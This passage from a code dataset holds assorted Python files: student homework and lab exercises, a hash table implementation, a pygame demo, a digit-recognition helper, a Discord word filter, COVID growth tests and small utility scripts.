ตีวอย่างการหาค่า float (ตัวเลขมีทศนิยม)\ni = 5\nprint( float(i) )\n\n\n# In[10]:\n\n## ANSWER Q2.d\n##\n\ndef average(numbers):\n pass\n\n\n\n# In[11]:\n\n## Test average()\nmynums = [i for i in range(51,101,5) ]\n\nprint(mynums)\naverage(mynums)\n\n\n# In[ ]:\n\n\n\n\n# ## Question 3 ( @6 pts x 2 = 12 pts )\n# \n# ### Q3.a \n# กำหนดให้ **dict** `NZ_COINS` เก็บค่าเงินของเหรียญนิวซีแลนด์ 5 ชนิด (ใช้ใน Q3.b)\n# \n# จงหาจำนวนเหรียญทั้งหมดใน list `mypiggy` ซึ่งเป็นกระปุกเงินเก็บเหรียญ\n\n# In[12]:\n\n## ไม่แก้ไขข้อมูลใน cell นี้\n\n## เหรียญเงินนิวซีแลนด์ เช่น '20c' หมายถึง 20 cents, '2$' หมายถึง 2 Dollars \nNZ_COINS = { \"10c\": 0.10, \"20c\": 0.20, \"50c\": 0.50, \"1$\": 1, \"2$\": 2 } \n\n## mypiggy keeps the number of NZ coins \nmypiggy = { \"20c\": 11, \"2$\": 4, \"10c\": 5, \"1$\": 12 }\n\n\n# In[13]:\n\n## ANSWER Q3.a\n## หาจำนวนเหรียญทั้งหมดใน list mypiggy \n##\n\n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q3.b\n# จงหามูลค่าของเงินทั้งหมดใน list `mypiggy` (หน่วย: ดอลลาร์ นิวซีแลนด์)\n\n# In[14]:\n\n## ANSWER Q3.b\n## \n\n\n\n\n# In[ ]:\n\n\n\n\n# ## Question 4 ( @6 pts x 2 = 12 pts )\n# \n# ### Q4.a \n# จาก class `Die` ที่กำหนดให้ จงสร้างลูกเต๋าเก็บไว้ใน list ชื่อ `my2dice` สองลูก แล้วหาค่าผลรวมของหน้าลูกเต๋าสองลูกนั้น\n\n# In[15]:\n\n## ไม่แก้ไขข้อมูลใน cell นี้\nfrom random import randint\n\nclass Die(object):\n def __init__(self):\n \"\"\" สร้างลูกเต๋า 1 ลุก 6 หน้า ที่มีค่าเริ่มต้นค่าสุ่ม 1..6 \"\"\"\n self.__face = randint(1,6)\n @property\n def face(self):\n \"\"\" return เลขหน้าลูกเต๋า 1..6 \"\"\"\n return self.__face\n \n def roll(self):\n \"\"\" ทอดลุกเต๋า เลขหน้าลูกเต๋าจะเปลี่ยนด้วยค่า random 1..6 \"\"\"\n self.__face = randint(1,6)\n \n def __str__(self):\n \"\"\" return ข้อความ str, พร้อมกับเลขหน้าลูกเต๋า \"\"\"\n return ( \"Die face: {}\".format(self.__face) )\n \n\n\n# In[16]:\n\nhelp(Die)\n\n\n# In[17]:\n\n## ANSWER Q4.a\n##\n##\n\n\n\n\n\n\n# In[ ]:\n\n\n\n\n# ### Q4.b \n# จงปรับปรุุง def `printDiceStat` เพื่อหาสถิติ (เปอร์เซ็นต์) ของการทอดลูกเต๋า จำนวน 1,000 ครั้ง โดยพิมพ์สถิติของหน้าลุกเต๋าทุกหน้า `1..6` โดยจะพิมพ์สถิติตามตัวอย่างต่อไปนี้\n# \n# ```\n# Number of rolls: 1000\n# \n# ---------- Dice Stats -----------\n# face <= 3 count: 497, 49.70 %\n# face > 3 count: 503, 50.30 % \n# ```\n# \n\n# In[18]:\n\ndef printDiceStat( numberRolls ):\n \"\"\" numberRolls : the number of rolls \"\"\"\n \n die = Die()\n\n # เก็บจำนวนครั้งที่ได้หน้าูลูกเต๋า <= 3 ที่ index = 0, จำนวนครั้งที่หน้าูลูกเต๋า > 3 ที่ index = 1 \n counts = [0, 0] \n \n \n \n \n \n \n \n print(\"Number of rolls: {}\".format(numberRolls)) \n \n print(\"\\n---------- Dice Stats -----------\") \n percentage = 100. * counts[0] / numberRolls\n print(\"face {} count: {:>3}, {:6.2f} %\".format( \"<= 3\", counts[0], percentage )) \n \n \n \n \n\n#--- Test the def printDiceStat ---\nrolls = 1000\nprintDiceStat( rolls )\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n\n# In[21]:\n\nimport datetime\ndatetime.datetime.now().isoformat()\n##\n## รหัสประจำตัวนักศึกษา :\n##\n## แล้วคลิก Run cell ครั้งเดียว เมื่อส่งงาน\n\n\n# ## end of IPynb\n","sub_path":"notebooks/cpe341_HW4_setA2_name_student_id.py","file_name":"cpe341_HW4_setA2_name_student_id.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"349742774","text":"# DannyAugustRamaputra_1706019791_lab07a.py\n# This program translates a numerical string into numbers then prints it to console\n#\n# A recursive function is used to process every the numerical string\n# and a seperate function is used to convert the strings into numbers\n# then prints it to the console.\n\n# define main functtion\ndef main():\n words = input(\"Please give a sequence of word: \") # get the string from user\n listOfWords = words.split() # create a list containing each numerical string\n showDigits(listOfWords)\n\n# Recursive function for translating a list of numeric words\n# into a sequence of digits and print them\ndef showDigits(listOfWords):\n if len(listOfWords) == 1: # base case\n printDigit(listOfWords[0]) # use printDigit() on the first word in list\n\n else: # recursive case\n printDigit(listOfWords[0]) # use printDigit() on the first word in list\n showDigits(listOfWords[1:]) # pass the remaining words in list into this function\n\n# Function for translating one word and printing the digit\ndef printDigit(word):\n # create a dictionary containing the key and value pairs for every numerical string\n wordSet = {\"one\":1, \"two\":2, \"three\":3, \"four\":4, \"five\":5,\n \"six\":6, \"seven\":7, \"eight\":8, \"nine\":9, \"zero\":0}\n # prints number into console, without new line\n print(wordSet[word], end = \"\")\n\n# run the main() function\nmain()\n","sub_path":"fprog_lab/lab07/Danny_August_Ramaputra_1706019791_lab07a.py","file_name":"Danny_August_Ramaputra_1706019791_lab07a.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"25372899","text":"\"\"\"\nFile: testmyrange.py\nProject 6.14\n\nDefines a function that behaves like Python's range function.\n\n\"\"\"\n \ndef myRange(start, stop = None, step = None):\n lyst = []\n if stop == None and step == None:\n stop = start\n start = 0\n step = 1\n if start < stop:\n if step == None:\n step = 1\n elif step <= 0:\n return lyst\n while start < stop:\n lyst.append(start)\n start += step\n else:\n if step == None or step > -1:\n return lyst\n while start > stop:\n lyst.append(start)\n start += step\n return lyst\n \ndef main():\n print(myRange(10))\n print(myRange(1, 10))\n print(myRange(1, 10, 2))\n print(myRange(10, 1, -1))\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"Exercises/6.14.py","file_name":"6.14.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"631078138","text":"from functools import reduce\r\n\r\nfrom PIL import Image, ImageFilter, ImageDraw\r\nfrom os import getcwd\r\n\r\n__author__ = 'oglandx'\r\n\r\n\r\ndef get_lines(path):\r\n with open(path) as file:\r\n return {\r\n line: content.strip()\r\n for line, content in enumerate(file)\r\n }\r\n\r\n\r\ndef get_class_paths(classes_file, paths_file):\r\n classes = get_lines(classes_file)\r\n paths = get_lines(paths_file)\r\n if len(classes) != len(paths):\r\n raise AssertionError(\"Lengths of files must be the same\")\r\n return {\r\n int(cls): [\r\n paths.get(_line) for _line, _cls in classes.items()\r\n if _cls == cls\r\n ] for cls in set(classes.values())\r\n }\r\n\r\n\r\ndef get_class_paths_limited(classes_file, paths_file, min_items_in_class=15, limit=None, **kwargs):\r\n return {\r\n cls: values[:limit] for cls, values in get_class_paths(classes_file, paths_file).items()\r\n if len(values) > min_items_in_class\r\n }\r\n\r\n\r\ndef get_colors(image, colors_num=10, swatch_size=10):\r\n '''\r\n https://gist.github.com/zollinger/1722663\r\n '''\r\n\r\n resize = min(image.width, image.height)\r\n image = image.resize((resize, resize))\r\n result = image.convert('P', palette=Image.ADAPTIVE, colors=colors_num)\r\n result.putalpha(0)\r\n colors = result.getcolors(resize*resize)\r\n\r\n pal = Image.new('RGB', (swatch_size*colors_num, swatch_size))\r\n\r\n draw = ImageDraw.Draw(pal)\r\n posx = 0\r\n for count, col in colors:\r\n draw.rectangle([posx, 0, posx + swatch_size, swatch_size], fill=col)\r\n posx += swatch_size\r\n del draw\r\n\r\n return pal\r\n\r\n\r\ndef img_prepare_func_pillow(path, **kwargs):\r\n raise NotImplemented()\r\n\r\n\r\ndef img_prepare_func_cv(path, **kwargs):\r\n raise NotImplemented()\r\n\r\n\r\ndef get_images_with_limit_class_items_im(classes_file, paths_file, root=None,\r\n img_prepare_func=None, exclude=None, **kwargs):\r\n if not root:\r\n root = getcwd()\r\n if not img_prepare_func:\r\n img_prepare_func = img_prepare_func_pillow\r\n if not exclude:\r\n exclude = []\r\n return {\r\n cls: [img_prepare_func('%s/%s' % (root, path), **kwargs) for path in paths]\r\n for cls, paths in get_class_paths_limited(classes_file, paths_file, **kwargs).items()\r\n if cls not in exclude\r\n }\r\n\r\n\r\ndef prepare(config):\r\n return get_images_with_limit_class_items_im(\r\n config.classes,\r\n config.paths,\r\n config.root,\r\n img_prepare_func=config.prepare,\r\n size=config.size,\r\n conversion_mode=config.conversion,\r\n min_items_in_class=config.min_items_in_class,\r\n limit=config.limit_items_for_class,\r\n exclude=config.exclude_classes,\r\n )\r\n","sub_path":"py/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"68217732","text":"\nimport torch.utils.data as data\nfrom PIL import Image\nfrom random import randrange\nfrom torchvision.transforms import Compose, ToTensor, Normalize\nimport pdb\nimport numpy as np\nimport pdb\n# --- Training dataset --- #\nclass TrainData(data.Dataset):\n def __init__(self, crop_size, train_data_dir,train_filename):\n super().__init__()\n train_list = train_data_dir + train_filename #+'trainlist.txt'\n print(train_list)\n with open(train_list) as f:\n contents = f.readlines()\n haze_names = [i.strip() for i in contents]\n gt_names = [i.strip().replace('rain','norain') for i in haze_names]\n\n self.haze_names = haze_names\n self.gt_names = gt_names\n self.crop_size = crop_size\n self.train_data_dir = train_data_dir\n\n def get_images(self, index):\n crop_width, crop_height = self.crop_size\n \n haze_name = self.haze_names[index]\n gt_name = self.gt_names[index]\n\n\n haze_img = Image.open(self.train_data_dir + haze_name)\n\n try:\n gt_img = Image.open(self.train_data_dir + gt_name)\n except:\n gt_img = Image.open(self.train_data_dir + gt_name).convert('RGB')\n\n width, height = haze_img.size\n # print(width,height,width - crop_width,height - crop_height)\n # if width < crop_width and height < crop_height :\n # haze_img = haze_img.resize((crop_width,crop_height), Image.ANTIALIAS)\n # gt_img = gt_img.resize((crop_width, crop_height), Image.ANTIALIAS)\n # elif width < crop_width :\n # haze_img = haze_img.resize((crop_width,height), Image.ANTIALIAS)\n # gt_img = gt_img.resize((crop_width,height), Image.ANTIALIAS)\n # elif height < crop_height :\n # haze_img = haze_img.resize((width,crop_height), Image.ANTIALIAS)\n # gt_img = gt_img.resize((width, crop_height), Image.ANTIALIAS)\n\n # wd_new = int(16*np.ceil(haze_img.size[0]/16.0))\n # ht_new = int(16*np.ceil(haze_img.size[1]/16.0))\n \n # width, height = haze_img.size\n # haze_img = haze_img.resize((crop_width,crop_height), Image.ANTIALIAS)\n # gt_img = gt_img.resize((crop_width,crop_height), Image.ANTIALIAS)\n # print(haze_name,width,height,width - crop_width,height - crop_height)\n # --- x,y coordinate of left-top corner --- #\n x, y = randrange(0, width - crop_width + 1), randrange(0, height - crop_height + 1)\n haze_crop_img = haze_img.crop((x, y, x + crop_width, y + crop_height))\n gt_crop_img = gt_img.crop((x, y, x + crop_width, y + crop_height))\n width, height = haze_crop_img.size\n # print(width,height)\n\n\n # --- Transform to tensor --- #\n transform_haze = Compose([ToTensor(), Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n transform_gt = Compose([ToTensor()])\n haze = transform_haze(haze_crop_img)\n gt = transform_gt(gt_crop_img)\n\n # --- Check the channel is 3 or not --- #\n if list(haze.shape)[0] is not 3 or list(gt.shape)[0] is not 3:\n raise Exception('Bad image channel: {}'.format(gt_name))\n\n return haze, gt\n\n def __getitem__(self, index):\n res = self.get_images(index)\n return res\n\n def __len__(self):\n return len(self.haze_names)\n\n","sub_path":"train_data.py","file_name":"train_data.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"75930215","text":"import pygame\nimport random\n\nWIDTH=800\nHEIGHT=600\n# RGB\nWHITE=(255,255,255)\nBLUE=(0,0,255)\nRED=(255,0,0)\n\ngame_display=pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"Blob World\")\nclock=pygame.time.Clock()\n\nclass Blob:\n\n def __init__(self,color):\n self.x=random.randrange(0,WIDTH)\n self.y=random.randrange(0,HEIGHT)\n self.size=random.randrange(4,8)\n self.color=color\n\n def move(self):\n self.move_x=random.randrange(-1,2)\n self.move_y = random.randrange(-1, 2)\n self.x+=self.move_x\n self.y+=self.move_y\n\n if self.x<0:self.x=0\n elif self.x>WIDTH:self.x=WIDTH\n\n if self.y < 0:self.y = 0\n elif self.y >HEIGHT:self.y = HEIGHT\n\n\ndef draw_environment(blob):\n # this is used to redraw the frame every time the frame is reloaded\n game_display.fill(WHITE)\n # this line is after the fill\n pygame.draw.circle(game_display,blob.color,[blob.x,blob.y],blob.size)\n pygame.display.update()\n blob.move()\n\n\ndef main():\n red_blob=Blob(RED)\n\n while True:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit()\n quit()\n\n draw_environment(red_blob)\n clock.tick(60)\n print(red_blob.x,red_blob.y)\n\nif __name__=='__main__':\n main()","sub_path":"14_creating an environment for our object.py","file_name":"14_creating an environment for our object.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"433737565","text":"import os\nimport sys\n\nBASE_COMMAND = \"vagrant ssh -c '%s'\"\n\ndef print_and_run_system(cmd):\n print(\"[Exec] \" + BASE_COMMAND % cmd)\n os.system(BASE_COMMAND % cmd)\n\nif __name__ == '__main__':\n if sys.argv[1] == 'runserver':\n if len(sys.argv) == 2:\n sys.argv.append('[::]:8000')\n else:\n sys.argv[2] = '[::]:' + sys.argv[2]\n print_and_run_system(\"python manage.py \" + \" \".join(sys.argv[1:]))\n","sub_path":"vmanage.py","file_name":"vmanage.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296347885","text":"import cv2\nimport numpy as np\n\ndef find_contours_examples():\n examples = []\n for i in range(10):\n digit = cv2.imread(str(i) + '.png')\n digit_grey = cv2.cvtColor(digit, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(digit_grey, 127, 255, cv2.THRESH_BINARY_INV) # inverse thresh to remove out border\n digit2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n print(hierarchy[0])\n print(len(hierarchy[0]))\n for j in range(len(hierarchy[0])):\n if hierarchy[0][j][3] == -1: # if contour doesn't have parent\n examples.append(contours[j])\n break\n return examples\n\ndef find_contours_captcha(path, t, b, l, r):\n screen = cv2.imread(path)\n captcha = screen[t:b, l:r]\n captcha_grey = cv2.cvtColor(captcha, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(captcha_grey, 127, 255, cv2.THRESH_BINARY_INV) # inverse thresh to remove out border\n captcha2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n contours = []\n for i in range(len(hierarchy[0])):\n if hierarchy[0][i][3] == -1: # if contour doesn't have parent\n contours.append(contours[i])\n break\n return contours\n\ndef image_recognition(examples, contours):\n result = []\n for contour in contours:\n lst = []\n for example in examples:\n lst.append(cv2.matchShapes(contour, example, 3, 0.0))\n x, y, w, h = cv2.boundingRect(contour)\n result.append((x, lst.index(min(lst))))\n result.sort()\n result = [str(i[1]) for i in result]\n print(''.join(result))\n\n\n\n\n\n\n\n\n","sub_path":"image_recognition.py","file_name":"image_recognition.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"247160295","text":"import discord\r\nimport asyncio\r\nfrom discord.ext import commands\r\n\r\nclass Blacklist:\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n async def on_message(self, message):\r\n if message.author == self.client.user:\r\n return\r\n if message.author.bot: return\r\n if 'kokot' in message.content:\r\n await self.client.delete_message(message)\r\n await self.client.send_message(message.author, \"Keyword `kokot` is not allowed on Qwesdy's Server\")\r\n await self.client.send_message(message.channel, \"That keyword is not allowed here\")\r\n\r\ndef setup(client):\r\n client.add_cog(Blacklist(client))\r\n","sub_path":"blacklist.py","file_name":"blacklist.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114415927","text":"from linkedlist import Node, LinkedList\n\nclass HashTableEntry:\n \"\"\"\n Linked List hash table key/value pair\n \"\"\"\n def __init__(self, key, value):\n self.key = key\n self.value = value\n \n def __str__(self):\n return f\"\"\n\n\n# Hash table can't have fewer than this many slots\nMIN_CAPACITY = 8\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n # ensure we are not below capacity\n if capacity < MIN_CAPACITY:\n capacity = MIN_CAPACITY\n \n # set up storage using a Linked List\n self.data = [LinkedList()] * capacity\n self.capacity = capacity\n \n # when the hashtable's load factor is greater\n # than this, it should be resized\n self.resizeWhenLoadFactorGreaterThan = 0.7\n \n # the count of items in the HT\n self.count = 0\n\n\n def get_num_slots(self):\n \"\"\"\n Return the length of the list you're using to hold the hash\n table data. (Not the number of items stored in the hash table,\n but the number of slots in the main list.)\n\n One of the tests relies on this.\n\n Implement this.\n \"\"\"\n return len(self.data)\n\n\n def get_load_factor(self):\n \"\"\"\n Return the load factor for this hash table.\n\n Implement this.\n \"\"\"\n return self.count / self.capacity\n\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 Hash, 64-bit\n\n Implement this, and/or DJB2.\n \"\"\"\n # don't fully understand,\n hval = 0x811c9dc5\n fnv_32_prime = 0x01000193\n for s in key:\n hval = hval ^ ord(s)\n hval = (hval * fnv_32_prime) % self.capacity\n return hval\n\n\n def djb2(self, key):\n \"\"\"\n DJB2 hash, 32-bit\n\n Implement this, and/or FNV-1.\n \"\"\"\n # Your code here\n\n\n # this is not being used anywhere--I am taking care\n # of the % in the hash itself\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.fnv1(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n # Search through the list and find if this key exists.\n # If it does, overwrite the value stored there\n \n # First, loop thru hashtable data\n for index in self.data:\n node_with_key = self.__find_node_with_key_in_ll(index, key)\n if node_with_key is not None:\n # A node with this key exists--simply update\n # its value\n node_with_key.value.value = value\n # ^^^ value.value because the node's value is a\n # HashTableEntry which also has value (with a key)\n return # we are done\n \n # The key was not found anywhere. Now move on to ADDING\n # an entry--but beforehand, let's see if we need to resize\n # the hashtable\n \n if self.get_load_factor() > self.resizeWhenLoadFactorGreaterThan:\n # the load is too much--double the size of the HT\n self.resize(self.capacity * 2)\n \n # create the node\n node = Node(HashTableEntry(key, value))\n # insert the node at the head of the linked list\n # that is at the hashed key's index\n index = self.fnv1(key)\n self.data[index].insert_at_head(node)\n # increment the HT item count\n self.count += 1\n \n def __find_node_with_key_in_ll(self, linkedlist, key): \n cur = linkedlist.head\n while cur is not None:\n if cur.value.key == key:\n return cur\n cur = cur.next\n return None\n\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n \n # get the index of this key\n index = self.fnv1(key)\n # find the ll at this index\n ll_at_index = self.data[index]\n # get the head\n cur = ll_at_index.head\n \n # Special case - deleting the head\n if cur is not None:\n if cur.value.key == key:\n ll_at_index.head = ll_at_index.head.next\n # decrement the HT item count\n self.count -= 1\n return cur\n \n # General case - deleting any node that is not the head\n prev = cur\n cur = cur.next\n while cur is not None:\n if cur.value.key == key: # the node to delete\n prev.next = cur.next # removes all refs to this node for GC\n # decrement the HT item count\n self.count -= 1\n return cur\n else:\n prev = prev.next\n cur = cur.next\n \n return None\n\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n # get the index of this key\n index = self.fnv1(key)\n # find the ll at this index\n ll_at_index = self.data[index]\n # find the node with this key in this ll\n found_node = self.__find_node_with_key_in_ll(ll_at_index, key)\n \n if found_node:\n return found_node.value.value\n # ^^^^ value.value because find_node returns a node with\n # a HashTableEntry as its value, which in turn has\n # its own value\n \n # not found\n return None\n\n\n def resize(self, new_capacity):\n \"\"\"\n Changes the capacity of the hash table and\n rehashes all key/value pairs.\n\n Implement this.\n \"\"\"\n # set the new capacity\n self.capacity = new_capacity\n # set the placeholder for the resized HT\n new_data = []\n # loop thru the current HT and add all its\n # values to new_data\n for ll_at_index in self.data:\n cur = ll_at_index.head\n while cur is not None:\n kv = {}\n kv[\"key\"] = cur.value.key\n kv[\"value\"] = cur.value.value\n new_data.append(kv)\n cur = cur.next\n \n # resize data\n self.data = [LinkedList()] * self.capacity\n for kv in new_data:\n self.put(kv[\"key\"], kv[\"value\"])\n\n\nif __name__ == \"__main__\":\n ht = HashTable(8)\n \n ht.put(\"line_1\", \"'Twas brillig, and the slithy toves\")\n ht.put(\"line_2\", \"Did gyre and gimble in the wabe:\")\n ht.put(\"line_3\", \"All mimsy were the borogoves,\")\n ht.put(\"line_4\", \"And the mome raths outgrabe.\")\n ht.put(\"line_5\", '\"Beware the Jabberwock, my son!')\n ht.put(\"line_6\", \"The jaws that bite, the claws that catch!\")\n ht.put(\"line_7\", \"Beware the Jubjub bird, and shun\")\n ht.put(\"line_8\", 'The frumious Bandersnatch!\"')\n ht.put(\"line_9\", \"He took his vorpal sword in hand;\")\n ht.put(\"line_10\", \"Long time the manxome foe he sought--\")\n ht.put(\"line_11\", \"So rested he by the Tumtum tree\")\n ht.put(\"line_12\", \"And stood awhile in thought.\")\n\n print(\"\")\n\n # Test storing beyond capacity\n for i in range(1, 13):\n print(ht.get(f\"line_{i}\"))\n\n # Test resizing\n old_capacity = ht.get_num_slots()\n ht.resize(ht.capacity * 2)\n new_capacity = ht.get_num_slots()\n\n print(f\"\\nResized from {old_capacity} to {new_capacity}.\\n\")\n\n # Test if data intact after resizing\n for i in range(1, 13):\n print(ht.get(f\"line_{i}\"))\n\n print(\"\")\n\n","sub_path":"hashtable/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"622371618","text":"#!/usr/bin/env python3\n# See: https://github.com/VirusTrack/COVIDvu/blob/master/LICENSE\n# vim: set fileencoding=utf-8:\n\nimport os\nimport pandas as pd\nfrom covidvu.cryostation import Cryostation\nfrom covidvu.config import MASTER_DATABASE\nfrom covidvu.pipeline.vugrowth import _computeGrowthFor\nfrom covidvu.pipeline.vugrowth import _getGrowthGaugeData\nfrom covidvu.pipeline.vugrowth import WINDOW_SIZE\nfrom covidvu.pipeline.vugrowth import _appendGrowthToCountries\nfrom covidvu.pipeline.vugrowth import computeGrowth\n\nfrom pandas.core.frame import DataFrame\nfrom pandas.core.series import Series\n\nREAL_DATABASE_PATH = './database/virustrack.db'\nTEST_TODAY_DATE = pd.to_datetime('2020-04-15').date()\nTEMP_DATABASE_NAME = 'temp-virustrack.db'\n\ndef makeTestDatabase():\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n with Cryostation(MASTER_DATABASE) as cryostation:\n unitedStates = cryostation['US']\n california = {'confirmed': unitedStates['provinces']['California']['confirmed']}\n newYork = {'confirmed': unitedStates['provinces']['New York']['confirmed']}\n newJersey = {'confirmed': unitedStates['provinces']['New Jersey']['confirmed']}\n\n item = {'confirmed': unitedStates['confirmed'],\n 'provinces': {'California': california,\n 'New York': newYork,\n 'New Jersey': newJersey,\n },\n 'key': 'US'}\n\n cryostationTest['US'] = item\n\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n with Cryostation(MASTER_DATABASE) as cryostation:\n italy = {'confirmed': cryostation['Italy']['confirmed'],\n 'key': 'Italy'}\n uk = {'confirmed': cryostation['United Kingdom']['confirmed'],\n 'key': 'United Kingdom'}\n\n cryostationTest['Italy'] = italy\n cryostationTest['United Kingdom'] = uk\n\n\ndef test__computeGrowthFor():\n makeTestDatabase()\n with Cryostation(TEMP_DATABASE_NAME) as cryostation:\n print('Loading time series for countries...')\n regions = cryostation.timeSeriesFor(regionType = 'country',\n casesType = 'confirmed',\n )\n growth = _computeGrowthFor(regions, WINDOW_SIZE)\n assert isinstance(growth, DataFrame)\n\n smoothCases = (regions.iloc[-WINDOW_SIZE:, 0].mean(),\n regions.iloc[-WINDOW_SIZE-1:-1, 0].mean(),\n regions.iloc[-WINDOW_SIZE-2:-2, 0].mean(),\n )\n growthFactorExpectedFinal = (smoothCases[0] - smoothCases[1])/(smoothCases[1] - smoothCases[2])\n assert abs(growth.iloc[-1,0] - growthFactorExpectedFinal) < 1e-4\n\n return growth\n\n\ndef test__getGrowthGaugeData():\n growth = test__computeGrowthFor()\n growthGaugeData = _getGrowthGaugeData(growth, TEST_TODAY_DATE)\n assert 'yesterday' in growthGaugeData\n assert 'lastWeek' in growthGaugeData\n assert 'lastTwoWeek' in growthGaugeData\n assert isinstance(growthGaugeData['yesterday'], Series)\n assert isinstance(growthGaugeData['lastWeek'], Series)\n assert isinstance(growthGaugeData['lastTwoWeek'], Series)\n assert (growth.columns.isin(growthGaugeData['yesterday'].index)).all()\n assert (growth.columns.isin(growthGaugeData['lastWeek'].index)).all()\n assert (growth.columns.isin(growthGaugeData['lastTwoWeek'].index)).all()\n return growthGaugeData\n\n\ndef test__appendGrowthToCountries():\n growthGaugeData = test__getGrowthGaugeData()\n _appendGrowthToCountries(growthGaugeData, TEMP_DATABASE_NAME)\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n assert isinstance(cryostationTest['US']['growth'], dict)\n assert isinstance(cryostationTest['Italy']['growth'], dict)\n assert isinstance(cryostationTest['United Kingdom']['growth'], dict)\n os.remove(TEMP_DATABASE_NAME)\n\n\ndef test_computeGrowth():\n makeTestDatabase()\n computeGrowth(regionType='country',\n casesType='confirmed',\n todayDate=TEST_TODAY_DATE,\n databasePath=TEMP_DATABASE_NAME)\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n assert isinstance(cryostationTest['US']['growth'], dict)\n assert isinstance(cryostationTest['Italy']['growth'], dict)\n assert isinstance(cryostationTest['United Kingdom']['growth'], dict)\n os.remove(TEMP_DATABASE_NAME)\n","sub_path":"work/test/covidvu/pipeline/test_vugrowth.py","file_name":"test_vugrowth.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"344687446","text":"from .models import Translation, GroupTranslation, Label\nimport os\nimport redis\nimport json\n\ndef loadTranslations():\n r = redis.Redis(host=os.environ['TRANSLATIONS_REDIS_HOST'],\n\tport=os.environ['TRANSLATIONS_REDIS_PORT'],\n password=os.environ['TRANSLATIONS_REDIS_PASS'],\n db=os.environ['TRANSLATIONS_REDIS_DB'])\n\t\n r.flushdb()\n\n translations = Translation.objects.all().order_by('label')\n for item in translations:\n k = 't_%s_%s' % (item.label.name, item.language.initials)\n r.set(k,item.value)\n\n groups = GroupTranslation.objects.all()\n for group in groups:\n lbls = Label.objects.filter(grouptranslation=group)\n t = Translation.objects.filter(label_id__in=lbls).order_by('language')\n resp = {}\n if t:\n currentLanguage = t.first().language.initials\n for item in t:\n if item.language.initials != currentLanguage:\n k = 'g_%s_%s' % (group.name, currentLanguage)\n r.set(k,json.dumps(resp))\n resp.clear()\n currentLanguage = item.language.initials\n\n resp.update({item.label.name:item.value})\n if len(resp) > 0:\n k = 'g_%s_%s' % (group.name, currentLanguage)\n r.set(k,json.dumps(resp))\n ","sub_path":"web/main/load_redis.py","file_name":"load_redis.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391719498","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/xdis/opcodes/opcode_22.py\n# Compiled at: 2020-04-18 17:55:45\n\"\"\"\nCPython 2.2 bytecode opcodes\n\nThis is similar to the opcode portion in Python 2.2's dis.py library.\n\"\"\"\nimport xdis.opcodes.opcode_2x as opcode_2x\nfrom xdis.opcodes.base import def_op, init_opdata, finalize_opcodes, format_extended_arg, update_pj2\nversion = 2.2\nl = locals()\ninit_opdata(l, opcode_2x, version)\ndef_op(l, 'FOR_LOOP', 114)\ndef_op(l, 'SET_LINENO', 127, 0, 0)\nupdate_pj2(globals(), l)\nopcode_arg_fmt = {'EXTENDED_ARG': 